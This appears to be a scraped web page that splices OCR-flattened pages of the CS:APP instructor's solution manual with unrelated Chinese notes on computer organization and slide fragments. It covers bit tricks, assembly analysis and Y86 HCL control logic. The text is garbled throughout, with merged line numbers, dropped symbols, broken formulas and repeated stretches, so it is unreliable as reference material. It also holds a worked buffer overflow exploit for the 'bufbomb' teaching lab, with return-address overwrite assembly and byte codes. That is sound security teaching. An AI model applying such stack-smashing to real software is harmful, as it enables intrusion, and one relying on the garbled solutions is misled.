buf7.long0x00000000PaddingNote that we have used the.align statement to get the assembler to insert enough extra bytes to use up twelve bytes for the code.We added an extra4bytes of0s at the end,because in some cases OBJDUMP would not generate the complete byte pattern for the data.These extra bytes(plus the termininating null byte)will overﬂow into the stack frame for test,but they will not affect the program behavior. Assembling this code and disassembling the object code gives us the following:10:6828850408push$0x804852825:b8ef be ad de mov$0xdeadbeef,%eax3a:c3ret4b:90nop Byte inserted for alignment.5c:e8ef ff bf bc call0xbcc00000Invalid disassembly.611:ef out%eax,(%dx)Trying to diassemble712:ff(bad)data813:bf00000000mov$0x0,%edi16CHAPTER1.SOLUTIONS TO HOMEWORK PROBLEMS From this we can read off the byte sequence:6828850408b8ef be ad de c390e8ef ff bf bc ef ff bf00000000Problem3.39Solution:This problem is a variant on the asm examples in the text.The code is actually fairly simple.It relies on the fact that asm outputs can be arbitrary lvalues,and hence we can use dest[0]and dest[1]directly in the output list.code/asm/asmprobs-ans.c Problem3.40Solution:For this example,students essentially have to write the entire function in assembly.There is no(apparent) way to interface between theﬂoating point registers and the C code using extended asm.code/asm/fscale.c1.4.CHAPTER4:PROCESSOR ARCHITECTURE17 1.4Chapter4:Processor ArchitectureProblem4.32Solution:This problem makes students carefully examine the tables showing the computation stages for the different instructions.The steps for iaddl are a hybrid of those for irmovl and OPl.StageFetchrA:rB M PCvalP PCExecuteR rB valEPC updateleaveicode:ifun M PCDecodevalB RvalE valBMemoryWrite backR valMPC valPProblem4.34Solution:The following HCL code includes implementations of both the iaddl instruction and the leave instruc-tions.The implementations are fairly straightforward given the computation steps listed in the solutions to problems4.32and4.33.You can test the solutions using the test code in the ptest subdirectory.Make sure you use command line argument‘-i.’18CHAPTER1.SOLUTIONS TO HOMEWORK PROBLEMS 1####################################################################2#HCL Description of Control for Single Cycle Y86Processor SEQ#3#Copyright(C)Randal E.Bryant,David R.O’Hallaron,2002#4####################################################################56##This is the solution for the iaddl and leave problems78####################################################################9#C Include’s.Don’t alter these#10#################################################################### 1112quote’#include<stdio.h>’13quote’#include"isa.h"’14quote’#include"sim.h"’15quote’int sim_main(int argc,char*argv[]);’16quote’int gen_pc(){return0;}’17quote’int main(int argc,char*argv[])’18quote’{plusmode=0;return sim_main(argc,argv);}’1920####################################################################21#Declarations.Do not change/remove/delete any of these#22#################################################################### 2324#####Symbolic representation of Y86Instruction Codes#############25intsig INOP’I_NOP’26intsig IHALT’I_HALT’27intsig IRRMOVL’I_RRMOVL’28intsig IIRMOVL’I_IRMOVL’29intsig IRMMOVL’I_RMMOVL’30intsig IMRMOVL’I_MRMOVL’31intsig IOPL’I_ALU’32intsig IJXX’I_JMP’33intsig ICALL’I_CALL’34intsig IRET’I_RET’35intsig IPUSHL’I_PUSHL’36intsig IPOPL’I_POPL’37#Instruction code for iaddl instruction38intsig IIADDL’I_IADDL’39#Instruction code for leave instruction40intsig ILEAVE’I_LEAVE’4142#####Symbolic representation of Y86Registers referenced explicitly##### 43intsig RESP’REG_ESP’#Stack Pointer44intsig REBP’REG_EBP’#Frame Pointer45intsig RNONE’REG_NONE’#Special value indicating"no register"4647#####ALU Functions referenced explicitly##### 48intsig ALUADD’A_ADD’#ALU should add its arguments4950#####Signals that can be referenced by control logic####################1.4.CHAPTER4:PROCESSOR ARCHITECTURE195152#####Fetch stage inputs#####53intsig pc’pc’#Program counter54#####Fetch stage computations#####55intsig icode’icode’#Instruction control code56intsig ifun’ifun’#Instruction function57intsig rA’ra’#rA field from instruction58intsig rB’rb’#rB field from instruction59intsig valC’valc’#Constant from instruction60intsig valP’valp’#Address of following instruction 6162#####Decode stage computations#####63intsig valA’vala’#Value from register A port64intsig valB’valb’#Value from register B port 6566#####Execute stage computations#####67intsig valE’vale’#Value computed by ALU68boolsig Bch’bcond’#Branch test6970#####Memory stage computations#####71intsig valM’valm’#Value read from memory727374####################################################################75#Control Signal Definitions.#76#################################################################### 7778################Fetch Stage################################### 7980#Does fetched instruction require a regid byte?81bool need_regids=82icode in{IRRMOVL,IOPL,IPUSHL,IPOPL,83IIADDL,84IIRMOVL,IRMMOVL,IMRMOVL};8586#Does fetched instruction require a constant word?87bool need_valC=88icode in{IIRMOVL,IRMMOVL,IMRMOVL,IJXX,ICALL,IIADDL};8990bool instr_valid=icode in91{INOP,IHALT,IRRMOVL,IIRMOVL,IRMMOVL,IMRMOVL,92IIADDL,ILEAVE,93IOPL,IJXX,ICALL,IRET,IPUSHL,IPOPL};9495################Decode Stage################################### 9697##What register should be used as the A source?98int srcA=[99icode in{IRRMOVL,IRMMOVL,IOPL,IPUSHL}:rA;20CHAPTER1.SOLUTIONS TO HOMEWORK PROBLEMS 101icode in{IPOPL,IRET}:RESP;1021:RNONE;#Don’t need register103];104105##What register should be used as the B source?106int srcB=[107icode in{IOPL,IRMMOVL,IMRMOVL}:rB;108icode in{IIADDL}:rB;109icode in{IPUSHL,IPOPL,ICALL,IRET}:RESP;110icode in{ILEAVE}:REBP;1111:RNONE;#Don’t need register112];113114##What register should be used as the E destination?115int dstE=[116icode in{IRRMOVL,IIRMOVL,IOPL}:rB;117icode in{IIADDL}:rB;118icode in{IPUSHL,IPOPL,ICALL,IRET}:RESP;119icode in{ILEAVE}:RESP;1201:RNONE;#Don’t need register121];122123##What register should be used as the M destination?124int dstM=[125icode in{IMRMOVL,IPOPL}:rA;126icode in{ILEAVE}:REBP;1271:RNONE;#Don’t need register128];129130################Execute Stage###################################131132##Select input A to ALU133int aluA=[134icode in{IRRMOVL,IOPL}:valA;135icode in{IIRMOVL,IRMMOVL,IMRMOVL}:valC;136icode in{IIADDL}:valC;137icode in{ICALL,IPUSHL}:-4;138icode in{IRET,IPOPL}:4;139icode in{ILEAVE}:4;140#Other instructions don’t need ALU141];142143##Select input B to ALU144int aluB=[145icode in{IRMMOVL,IMRMOVL,IOPL,ICALL,146IPUSHL,IRET,IPOPL}:valB;147icode in{IIADDL,ILEAVE}:valB;148icode in{IRRMOVL,IIRMOVL}:0;149#Other instructions don’t need ALU1.4.CHAPTER4:PROCESSOR ARCHITECTURE21151152##Set the ALU function153int alufun=[154icode==IOPL:ifun;1551:ALUADD;156];157158##Should the condition codes be updated?159bool set_cc=icode in{IOPL,IIADDL};160161################Memory Stage###################################162163##Set read control signal164bool mem_read=icode in{IMRMOVL,IPOPL,IRET,ILEAVE};165166##Set write control signal167bool mem_write=icode in{IRMMOVL,IPUSHL,ICALL};168169##Select memory address170int mem_addr=[171icode in{IRMMOVL,IPUSHL,ICALL,IMRMOVL}:valE;172icode in{IPOPL,IRET}:valA;173icode in{ILEAVE}:valA;174#Other instructions don’t need address175];176177##Select memory input data178int mem_data=[179#Value from register180icode in{IRMMOVL,IPUSHL}:valA;181#Return PC182icode==ICALL:valP;183#Default:Don’t write anything184];185186################Program Counter Update############################187188##What address should instruction be fetched at189190int new_pc=[191#e instruction constant192icode==ICALL:valC;193#Taken e instruction constant194icode==IJXX&&Bch:valC;195#Completion of RET e value from stack196icode==IRET:valM;197#Default:Use incremented PC1981:valP;199];22CHAPTER 1.SOLUTIONS TO HOMEWORK PROBLEMSME DMispredictE DM E DM M E D E DMGen./use 1W E DM Gen./use 2WE DM Gen./use 3W Figure 1.1:Pipeline states for special control conditions.The pairs connected by arrows can arisesimultaneously.code/arch/pipe-nobypass-ans.hcl1.4.CHAPTER4:PROCESSOR ARCHITECTURE232#At most one of these can be true.3bool F_bubble=0;4bool F_stall=5#Stall if either operand source is destination of6#instruction in execute,memory,or write-back stages7d_srcA!=RNONE&&d_srcA in8{E_dstM,E_dstE,M_dstM,M_dstE,W_dstM,W_dstE}||9d_srcB!=RNONE&&d_srcB in10{E_dstM,E_dstE,M_dstM,M_dstE,W_dstM,W_dstE}||11#Stalling at fetch while ret passes through pipeline12IRET in{D_icode,E_icode,M_icode};1314#Should I stall or inject a bubble into Pipeline Register D?15#At most one of these can be true.16bool D_stall=17#Stall if either operand source is destination of18#instruction in execute,memory,or write-back stages19#but not part of mispredicted branch20!(E_icode==IJXX&&!e_Bch)&&21(d_srcA!=RNONE&&d_srcA in22{E_dstM,E_dstE,M_dstM,M_dstE,W_dstM,W_dstE}||23d_srcB!=RNONE&&d_srcB in24{E_dstM,E_dstE,M_dstM,M_dstE,W_dstM,W_dstE});2526bool D_bubble=27#Mispredicted branch28(E_icode==IJXX&&!e_Bch)||29#Stalling at fetch while ret passes through pipeline30!(E_icode in{IMRMOVL,IPOPL}&&E_dstM in{d_srcA,d_srcB})&&31#but not condition for a generate/use hazard32!(d_srcA!=RNONE&&d_srcA in33{E_dstM,E_dstE,M_dstM,M_dstE,W_dstM,W_dstE}||34d_srcB!=RNONE&&d_srcB in35{E_dstM,E_dstE,M_dstM,M_dstE,W_dstM,W_dstE})&&36IRET in{D_icode,E_icode,M_icode};3738#Should I stall or inject a bubble into Pipeline Register E?39#At most one of these can be true.40bool E_stall=0;41bool E_bubble=42#Mispredicted branch43(E_icode==IJXX&&!e_Bch)||44#Inject bubble if either operand source is destination of45#instruction in execute,memory,or write back stages46d_srcA!=RNONE&&47d_srcA in{E_dstM,E_dstE,M_dstM,M_dstE,W_dstM,W_dstE}|| 48d_srcB!=RNONE&&49d_srcB in{E_dstM,E_dstE,M_dstM,M_dstE,W_dstM,W_dstE};5024CHAPTER1.SOLUTIONS TO HOMEWORK PROBLEMS 52#At most one of these can be true.53bool M_stall=0;54bool M_bubble=0;code/arch/pipe-full-ans.hcl 1####################################################################2#HCL Description of Control for Pipelined Y86Processor#3#Copyright(C)Randal E.Bryant,David R.O’Hallaron,2002#4####################################################################56##This is the solution for the iaddl and leave problems78####################################################################9#C Include’s.Don’t alter these#10#################################################################### 1112quote’#include<stdio.h>’13quote’#include"isa.h"’14quote’#include"pipeline.h"’15quote’#include"stages.h"’16quote’#include"sim.h"’17quote’int sim_main(int argc,char*argv[]);’18quote’int main(int argc,char*argv[]){return sim_main(argc,argv);}’1920####################################################################21#Declarations.Do not change/remove/delete any of these#22#################################################################### 2324#####Symbolic representation of Y86Instruction Codes#############25intsig INOP’I_NOP’26intsig IHALT’I_HALT’27intsig IRRMOVL’I_RRMOVL’28intsig IIRMOVL’I_IRMOVL’29intsig IRMMOVL’I_RMMOVL’30intsig IMRMOVL’I_MRMOVL’31intsig IOPL’I_ALU’32intsig IJXX’I_JMP’33intsig ICALL’I_CALL’34intsig IRET’I_RET’1.4.CHAPTER4:PROCESSOR ARCHITECTURE25 36intsig IPOPL’I_POPL’37#Instruction code for iaddl instruction38intsig IIADDL’I_IADDL’39#Instruction code for leave instruction40intsig ILEAVE’I_LEAVE’4142#####Symbolic representation of Y86Registers referenced explicitly##### 43intsig RESP’REG_ESP’#Stack Pointer44intsig REBP’REG_EBP’#Frame Pointer45intsig RNONE’REG_NONE’#Special value indicating"no register"4647#####ALU Functions referenced explicitly##########################48intsig ALUADD’A_ADD’#ALU should add its arguments4950#####Signals that can be referenced by control logic##############5152#####Pipeline Register F##########################################5354intsig F_predPC’pc_curr->pc’#Predicted value of PC5556#####Intermediate Values in Fetch Stage###########################5758intsig f_icode’if_id_next->icode’#Fetched instruction code59intsig f_ifun’if_id_next->ifun’#Fetched instruction function60intsig f_valC’if_id_next->valc’#Constant data of fetched instruction 61intsig f_valP’if_id_next->valp’#Address of following instruction 6263#####Pipeline Register D##########################################64intsig D_icode’if_id_curr->icode’#Instruction code65intsig D_rA’if_id_curr->ra’#rA field from instruction66intsig D_rB’if_id_curr->rb’#rB field from instruction67intsig D_valP’if_id_curr->valp’#Incremented PC6869#####Intermediate Values in Decode Stage#########################7071intsig d_srcA’id_ex_next->srca’#srcA from decoded instruction72intsig d_srcB’id_ex_next->srcb’#srcB from decoded instruction73intsig d_rvalA’d_regvala’#valA read from register file74intsig d_rvalB’d_regvalb’#valB read from register file 7576#####Pipeline Register E##########################################77intsig E_icode’id_ex_curr->icode’#Instruction code78intsig E_ifun’id_ex_curr->ifun’#Instruction function79intsig E_valC’id_ex_curr->valc’#Constant data80intsig E_srcA’id_ex_curr->srca’#Source A register ID81intsig E_valA’id_ex_curr->vala’#Source A value82intsig E_srcB’id_ex_curr->srcb’#Source B register ID83intsig E_valB’id_ex_curr->valb’#Source B value84intsig E_dstE’id_ex_curr->deste’#Destination E register ID。

深入理解计算机系统答案

深入理解计算机系统答案【篇一：深入理解计算机系统笔记】(1)对于一个无符号数字 x, 截断它到 k 位的结果就相当于计算 x mod 2^k.(2)在大多数的机器上 ,整数乘法指令相当地慢 ,需要 12 或者更多的始终周期 ,然而其他整数运算－例如加法、减法、位移运算和移位－只需要 1 个时钟周期 .因此 ,编译器使用的一项重要的优化就是试着使用移位和加法运算的组合来代替乘以常数因子的乘法.(3)在大多数的机器上 ,整数除法要比整数乘法更慢－需要 30 或者更多的始终周期 .除以 2 的幂也可以用移位运算来实现 ,只不过我们用的是右移 ,而不是左移 .对于无符号和二进制补码数 ,分别使用逻辑移位和算术移位来达到目的 .1. 注意系统的分类：主流的 ia32( 也就是 x86) ，以及 x86-64( 也就是x64) ，还有种 intel 的与原 32 位系统不兼容的 ia64 。

2. 编译系统由预处理器，编译器，汇编器和链接器组成。

3.单指令多数据并行称为 simd 并行，其扩展为 sse 指令集。

4.x64 上 long 为 8 字节，指针也为 8 字节。

5.无符号数右移必须采用逻辑右移，而有符号数一般采用算术右移。

6.有符号数遇见无符号数会默认强转为无符号数。

7.short 转为 unsigned 时，是先扩展大小再符号转换。

8. 补码非的计算：从左到右将第一个为 1 的位前的所有位取反。

9.负数的补码移位向下舍入。

10.正浮点数能使用整数排序函数来进行排序。

11.浮点加法和乘法不具备结合性，浮点乘法在加法上不具备分配性。

12.预处理器扩展源代码，然后编译器生成源代码的文本汇编代码，汇编器转成二进制汇编码，链接器生成exe 或 dll 或 lib 。

13.寄存器可以保存地址也可以保存值。

注意汇编中的加括号表示为取该地址指向的值，如 (%eax) 指 %eax 中保存的地址指向的值。

14.传送指令的两个操作符不能都指向存储器。

计算机组成原理课后答案(第二版)第七章

14. 设相对寻址的转移指令占两个字节，第一个字节是操作码，第二个字节是相对位移量，用补码表示。假设当前转移指令第一字节所在的地址为2000H，且CPU每取出一个字节便自动完成（PC）+1PC的操作。试问当执行“JMP *+8”和“JMP *-9”指令时，转移指令第二字节的内容各为多少？
第 8 张幻灯片
11. 画出先变址再间址及先间址再变址的寻址过程示意图。
解：1）先变址再间址寻址过程简单示意如下：目录 EA=[(IX)+A]， (IX)+1IX
上一页 IR OP M
A
下一页
+1 退出 IX
主存操作数
ALU
IX：变址寄存器，既可是专用寄存器，也可是通用寄存器之一。
设一重间接
第 19 张幻灯片
目录
上一页下一页退出
（6）六种寻址方式中，立即寻址指令执行时间最短，因为此时不需寻址；
间接寻址指令执行时间最长，因为寻址操作需访存一次到多次；
相对寻址便于程序浮动，因为此时
操作数位置可随程序存储区的变动而改变，总是相对于程序一段距离；
变址寻址最适合处理数组问题，因
为此时变址值可自动修改而不需要修改程序。
EA =（PR）‖A （有效地址=页面地址“拼接”6位形式地址）
这样得到22位有效地址。
第 24 张幻灯片
目录
上一页下一页退出
通过基址寻址与段寻址获得实际地址的区别：
1）基址寻址的基地址一般比较长（存储器地址位数），位移量比较短（=形式地址位数），相加后得到的有效地址长度=基地址长度。此时主存不分段。
EA1= (PC) +8 = 2002H+0008H = 200AH

深入理解计算机系统答案（超高清电子版）

深⼊理解计算机系统答案（超⾼清电⼦版）Computer Systems:A Programmer’s Perspective Instructor’s Solution Manual1Randal E.BryantDavid R.O’HallaronDecember4,20032Chapter1Solutions to Homework ProblemsThe text uses two different kinds of exercises:Practice Problems.These are problems that are incorporated directly into the text,with explanatory solutions at the end of each chapter.Our intention is that students will work on these problems as they read the book.Each one highlights some particular concept.Homework Problems.These are found at the end of each chapter.They vary in complexity from simple drills to multi-week labs and are designed for instructors to give as assignments or to use as recitation examples.This document gives the solutions to the homework problems.1.1Chapter1:A Tour of Computer Systems1.2Chapter2:Representing and Manipulating InformationProblem2.40Solution:This exercise should be a straightforward variation on the existing code.2CHAPTER1.SOLUTIONS TO HOMEWORK PROBLEMS1011void show_double(double x)12{13show_bytes((byte_pointer)&x,sizeof(double));14}code/data/show-ans.c 1int is_little_endian(void)3/*MSB=0,LSB=1*/4int x=1;56/*Return MSB when big-endian,LSB when little-endian*/7return(int)(*(char*)&x);8}1.2.CHAPTER2:REPRESENTING AND MANIPULATING INFORMATION3 There are many solutions to this problem,but it is a little bit tricky to write one that works for any word size.Here is our solution:code/data/shift-ans.c The above code peforms a right shift of a word in which all bits are set to1.If the shift is arithmetic,the resulting word will still have all bits set to1.Problem2.45Solution:This problem illustrates some of the challenges of writing portable code.The fact that1<<32yields0on some32-bit machines and1on others is common source of bugs.A.The C standard does not de?ne the effect of a shift by32of a32-bit datum.On the SPARC(andmany other machines),the expression x</doc/dde1f034f111f18583d05a59.html pute beyond_msb as2<<31.C.We cannot shift by more than15bits at a time,but we can compose multiple shifts to get thedesired effect.Thus,we can compute set_msb as2<<15<<15,and beyond_msb as set_msb<<1.Problem2.46Solution:This problem highlights the difference between zero extension and sign extension.It also provides an excuse to show an interesting trick that compilers often use to use shifting to perform masking and sign extension.A.The function does not perform any sign extension.For example,if we attempt to extract byte0fromword0xFF,we will get255,rather than.B.The following code uses a well-known trick for using shifts to isolate a particular range of bits and toperform sign extension at the same time.First,we perform a left shift so that the most signi?cant bit of the desired byte is at bit position31.Then we right shift by24,moving the byte into the proper position and peforming sign extension at the same time. 4CHAPTER1.SOLUTIONS TO HOMEWORK PROBLEMS 3int left=word<<((3-bytenum)<<3);4return left>>24;5}Problem2.48Solution:This problem lets students rework the proof that complement plus increment performs negation.We make use of the property that two’s complement addition is associative,commutative,and has additive/doc/dde1f034f111f18583d05a59.html ing C notation,if we de?ne y to be x-1,then we have?y+1equal to-y,and hence?y equals -y+1.Substituting gives the expression-(x-1)+1,which equals-x.Problem2.49Solution:This problem requires a fairly deep understanding of two’s complement arithmetic.Some machines only provide one form of multiplication,and hence the trick shown in the code here is actually required to perform that actual form.As seen in Equation2.16we have.The?nal term has no effect on the-bit representation of,but the middle term represents acode/data/uhp-ans.c Problem2.50Solution:1.2.CHAPTER2:REPRESENTING AND MANIPULATING INFORMATION5A.:x+(x<<2)B.:x+(x<<3)C.:(x<<4)-(x<<1)D.:(x<<3)-(x<<6)Problem2.51Solution:Bit patterns similar to these arise in many applications.Many programmers provide them directly in hex-adecimal,but it would be better if they could express them in more abstract ways.A..((1<B..((1<Problem2.52Solution:Byte extraction and insertion code is useful in many contexts.Being able to write this sort of code is an important skill to foster.code/data/rbyte-ans.c Problem2.53Solution:These problems are fairly tricky.They require generating masks based on the shift amounts.Shift value k equal to0must be handled as a special case,since otherwise we would be generating the mask by performing a left shift by32.6CHAPTER1.SOLUTIONS TO HOMEWORK PROBLEMS 1unsigned srl(unsigned x,int k)2{3/*Perform shift arithmetically*/4unsigned xsra=(int)x>>k;5/*Make mask of low order32-k bits*/6unsigned mask=k?((1<<(32-k))-1):?0;78return xsra&mask;9}code/data/rshift-ans.c 1int sra(int x,int k)2{3/*Perform shift logically*/4int xsrl=(unsigned)x>>k;5/*Make mask of high order k bits*/6unsigned mask=k??((1<<(32-k))-1):0;78return(x<0)?mask|xsrl:xsrl;1.2.CHAPTER2:REPRESENTING AND MANIPULATING INFORMATION7B.(a)For,we have,,code/data/?oatge-ans.c 1int float_ge(float x,float y)2{3unsigned ux=f2u(x);4unsigned uy=f2u(y);5unsigned sx=ux>>31;6unsigned sy=uy>>31;78return9(ux<<1==0&&uy<<1==0)||/*Both are zero*/10(!sx&&sy)||/*x>=0,y<0*/11(!sx&&!sy&&ux>=uy)||/*x>=0,y>=0*/12(sx&&sy&&ux<=uy);/*x<0,y<0*/13},8CHAPTER1.SOLUTIONS TO HOMEWORK PROBLEMS This exercise is of practical value,since Intel-compatible processors perform all of their arithmetic in ex-tended precision.It is interesting to see how adding a few more bits to the exponent greatly increases the range of values that can be represented.Description Extended precisionValueSmallest denorm.Largest norm.Problem2.59Solution:We have found that working through?oating point representations for small word sizes is very instructive. Problems such as this one help make the description of IEEE?oating point more concrete.Description8000Smallest value4700Largest denormalized———1.3.CHAPTER3:MACHINE LEVEL REPRESENTATION OF C PROGRAMS91/*Compute2**x*/2float fpwr2(int x){4unsigned exp,sig;5unsigned u;67if(x<-149){8/*Too small.Return0.0*/9exp=0;10sig=0;11}else if(x<-126){12/*Denormalized result*/13exp=0;14sig=1<<(x+149);15}else if(x<128){16/*Normalized result.*/17exp=x+127;18sig=0;19}else{20/*Too big.Return+oo*/21exp=255;22sig=0;23}24u=exp<<23|sig;25return u2f(u);26}10CHAPTER1.SOLUTIONS TO HOMEWORK PROBLEMS int decode2(int x,int y,int z){int t1=y-z;int t2=x*t1;int t3=(t1<<31)>>31;int t4=t3?t2;return t4;}Problem3.32Solution:This code example demonstrates one of the pedagogical challenges of using a compiler to generate assembly code examples.Seemingly insigni?cant changes in the C code can yield very different results.Of course, students will have to contend with this property as work with machine-generated assembly code anyhow. They will need to be able to decipher many different code patterns.This problem encourages them to think in abstract terms about one such pattern.1movl8(%ebp),%edx x2movl12(%ebp),%ecx y3movl%edx,%eax4subl%ecx,%eax result=x-y5cmpl%ecx,%edx Compare x:y6jge.L3if>=goto done:7movl%ecx,%eax8subl%edx,%eax result=y-x9.L3:done:A.When,it will compute?rst and then.When it just computes.B.The code for then-statement gets executed unconditionally.It then jumps over the code for else-statement if the test is false.C.then-statementt=test-expr;if(t)goto done;else-statementdone:D.The code in then-statement must not have any side effects,other than to set variables that are also set1.3.CHAPTER3:MACHINE LEVEL REPRESENTATION OF C PROGRAMS11Problem3.33Solution:This problem requires students to reason about the code fragments that implement the different branches of a switch statement.For this code,it also requires understanding different forms of pointer dereferencing.A.In line29,register%edx is copied to register%eax as the return value.From this,we can infer that%edx holds result.B.The original C code for the function is as follows:1/*Enumerated type creates set of constants numbered0and upward*/2typedef enum{MODE_A,MODE_B,MODE_C,MODE_D,MODE_E}mode_t;34int switch3(int*p1,int*p2,mode_t action)5{6int result=0;7switch(action){8case MODE_A:12case MODE_B:13*p2+=*p1;14result=*p2;15break;16case MODE_C:17*p2=15;18result=*p1;19break;20case MODE_D:21*p2=*p1;22/*Fall Through*/23case MODE_E:24result=17;25break;26default:27result=-1;28}29return result;30}Problem3.34Solution:This problem gives students practice analyzing disassembled code.The switch statement contains all the features one can imagine—cases with multiple labels,holes in the range of possible case values,and cases that fall through.12CHAPTER1.SOLUTIONS TO HOMEWORK PROBLEMS 1int switch_prob(int x)2{3int result=x;45switch(x){6case50:7case52:8result<<=2;9break;10case53:11result>>=2;15/*Fall through*/16case55:17result*=result;18/*Fall through*/19default:20result+=10;21}2223return result;24}code/asm/varprod-ans.c 1int var_prod_ele_opt(var_matrix A,var_matrix B,int i,int k,int n) 2{3int*Aptr=&A[i*n];4int*Bptr=&B[k];5int result=0;6int cnt=n;78if(n<=0)9return result;1011do{12result+=(*Aptr)*(*Bptr);13Aptr+=1;14Bptr+=n;1.3.CHAPTER3:MACHINE LEVEL REPRESENTATION OF C PROGRAMS13 16}while(cnt); 1718return result;19}code/asm/structprob-ans.c 1typedef struct{2int idx;3int x[4];4}a_struct;14CHAPTER1.SOLUTIONS TO HOMEWORK PROBLEMS 1/*Read input line and write it back*/ 2/*Code will work for any buffer size.Bigger is more time-efficient*/ 3#define BUFSIZE644void good_echo()5{6char buf[BUFSIZE];7int i;8while(1){9if(!fgets(buf,BUFSIZE,stdin))10return;/*End of file or error*/11/*Print characters in buffer*/12for(i=0;buf[i]&&buf[i]!=’\n’;i++)13if(putchar(buf[i])==EOF)14return;/*Error*/15if(buf[i]==’\n’){16/*Reached terminating newline*/17putchar(’\n’);18return;19}20}21}An alternative implementation is to use getchar to read the characters one at a time.Problem3.38Solution:Successfully mounting a buffer over?ow attack requires understanding many aspects of machine-level pro-grams.It is quite intriguing that by supplying a string to one function,we can alter the behavior of another function that should always return a? xed value.In assigning this problem,you should also give students a stern lecture about ethical computing practices and dispell any notion that hacking into systems is a desirable or even acceptable thing to do.Our solution starts by disassembling bufbomb,giving the following code for getbuf: 1080484f4:280484f4:55push%ebp380484f5:89e5mov%esp,%ebp480484f7:83ec18sub$0x18,%esp580484fa:83c4f4add$0xfffffff4,%esp680484fd:8d45f4lea0xfffffff4(%ebp),%eax78048500:50push%eax88048501:e86a ff ff ff call804847098048506:b801000000mov$0x1,%eax10804850b:89ec mov%ebp,%esp11804850d:5d pop%ebp12804850e:c3retWe can see on line6that the address of buf is12bytes below the saved value of%ebp,which is4bytes1.3.CHAPTER3:MACHINE LEVEL REPRESENTATION OF C PROGRAMS15 of%ebp,and the address of the start of the buffer.To determine the relevant values,we run GDB as follows:1.First,we set a breakpoint in getbuf and run the program to that point:(gdb)break getbuf(gdb)runComparing the stopping point to the disassembly,we see that it has already set up the stack frame.2.We get the value of buf by computing a value relative to%ebp:(gdb)print/x(%ebp+12)This gives0xbfffefbc.3.We?nd the saved value of register%ebp by dereferencing the current value of this register:(gdb)print/x*$ebpThis gives0xbfffefe8.4.We?nd the value of the return pointer on the stack,at offset4relative to%ebp:(gdb)print/x*((int*)$ebp+1)This gives0x8048528We can now put this information together to generate assembly code for our attack:1pushl$0x8048528Put correct return pointer back on stack2movl$0xdeadbeef,%eax Alter return value3ret Re-execute return4.align4Round up to125.long0xbfffefe8Saved value of%ebp6.long0xbfffefbc Location of buf7.long0x00000000PaddingNote that we have used the.align statement to get the assembler to insert enough extra bytes to use up twelve bytes for the code.We added an extra4bytes of0s at the end,because in some cases OBJDUMP would not generate the complete byte pattern for the data.These extra bytes(plus the termininating null byte)will over?ow into the stack frame for test,but they will not affect the program behavior. Assembling this code and disassembling the object code gives us the following:10:6828850408push$0x804852825:b8ef be ad de mov$0xdeadbeef,%eax3a:c3ret4b:90nop Byte inserted for alignment.5c:e8ef ff bf bc call0xbcc00000Invalid disassembly.611:ef out%eax,(%dx)Trying to diassemble712:ff(bad)data16CHAPTER1.SOLUTIONS TO HOMEWORK PROBLEMS From this we can read off the byte sequence:Problem3.39Solution:This problem is a variant on the asm examples in the text.The code is actually fairly simple.It relies on the fact that asm outputs can be arbitrary lvalues,and hence we can use dest[0]and dest[1]directly in the output list.code/asm/asmprobs-ans.c Problem3.40Solution:For this example,students essentially have to write the entire function in assembly.There is no(apparent) way to interface between the?oating point registers and the C code using extended asm.code/asm/fscale.c1.4.CHAPTER4:PROCESSOR ARCHITECTURE17 1.4Chapter4:Processor ArchitectureProblem4.32Solution:This problem makes students carefully examine the tables showing the computation stages for the different instructions.The steps for iaddl are a hybrid of those for irmovl and OPl.StageFetchrA:rB M PCvalP PCExecuteR rB valEPC updateleaveicode:ifun M PCDecodevalB RvalE valBMemoryWrite backR valMPC valPProblem4.34Solution:The following HCL code includes implementations of both the iaddl instruction and the leave instruc-tions.The implementations are fairly straightforward given the computation steps listed in the solutions to problems4.32and4.33.You can test the solutions using the test code in the ptest subdirectory.Make sure you use command line argument‘-i.’。

编程卓越之道(卷1)：深入理解计算机(第2版)

读书笔记
这是《编程卓越之道（卷1）：深入理解计算机（第2版）》的读书笔记模板，可以替换为自己的心得。
精彩摘录
这是《编程卓越之道（卷1）：深入理解计算机（第2版）》的读书笔记模板，可以替换为自己的精彩内容摘录。
谢谢观看
01
4.1浮点运算简介
02
4.2 IEEE 浮点格式
04
4.4舍入
06
4.6浮点数异常
03
4.3规约形式与非规约形式
05
4.5特殊的浮点值
4.7浮点运算
4.8更多信息
4.2.1单精度浮点格式 4.2.2双精度浮点格式 4.2.3扩展精度浮点格式 4.2.4四精度浮点格式
4.7.1浮点表示形式 4.7.2浮点数的加减法 4.7.3浮点数的乘除法
12.5系统总线与数据传输速率
12.7握手
12.8 I/O端口超时
12.9中断与轮询式 I/O
12.10保护模式操作与设备驱动程序
12.11更多信息
12.3.1内存映射输入/输出 12.3.2 I/O映射输入/输出 12.3.3直接内存访问
12.5.1 PCI总线的性能 12.5.2 ISA总线的性能 12.5.3 AGP总线
3.1二进制和十六进制数字的算术运算
3.2位的逻辑运算
3.3二进制数值和位串的逻
3.6位字段和打包数据
3.7数据的打包和解包
3.8更多信息
3.1.1二进制加法 3.1.2二进制减法 3.1.3二进制乘法 3.1.4二进制除法
3.4.1使用AND运算判断位串中的一位 3.4.2使用AND运算判断多个位为零或非零 3.4.3比较二进制字符串中的多个位 3.4.4使用AND运算创建模n计数器

深入理解计算机系统chapter

科学计算
用于解决复杂的数学问题和模拟实验，如天气预报、核爆炸模拟等。
人工智能
用于模拟人类智能行为，如语音识别、图像识别等。
网络通信
用于实现计算机之间的数据传输和通信，如互联网、物联网等。
02
计算机硬件系统
中央处理器
运算器
执行算术和逻辑运算，处理数据。
控制器
控制计算机各部件协调工作，保证计算机按照程序设定的步骤执行。
复杂指令集（CISC）和精简指令集（RISC）
CISC指令丰富，功能强大，但复杂度高；RISC指令精简，设计思路简洁，效率高。
程序的执行过程
程序的加载
将程序从外存加载到内存，为执行做好准备。
指令的取指与执行
根据程序计数器（PC）的值从内存中取出指令，解码并执行。
数据的存取与运算
根据指令对数据进行存取和运算，结果存回寄存器或内存。
深入理解计算机系统 chapter
目录
• 计算机系统概述 • 计算机硬件系统 • 计算机软件系统 • 计算机系统的工作原理 • 计算机系统的性能评价 • 计算机系统的安全与可靠性
01
计算机系统概述
计算机系统的组成
硬件
包括中央处理器（CPU）、内存、输入输出设备等，提供计算能力和数据存储。
软件
输出设备
将计算机处理后的结果转换为人类可读的形式，如显示器、打印机、音响等。
输入/输出接口
连接输入/输出设备与计算机主机的桥梁，实现数据的传输和控制。
03
计算机软件系统
系统软件
操作系统
提供计算机硬件与应用程序之间的接口，控制和管理计算机的硬件及软件资源。
数据库管理系统
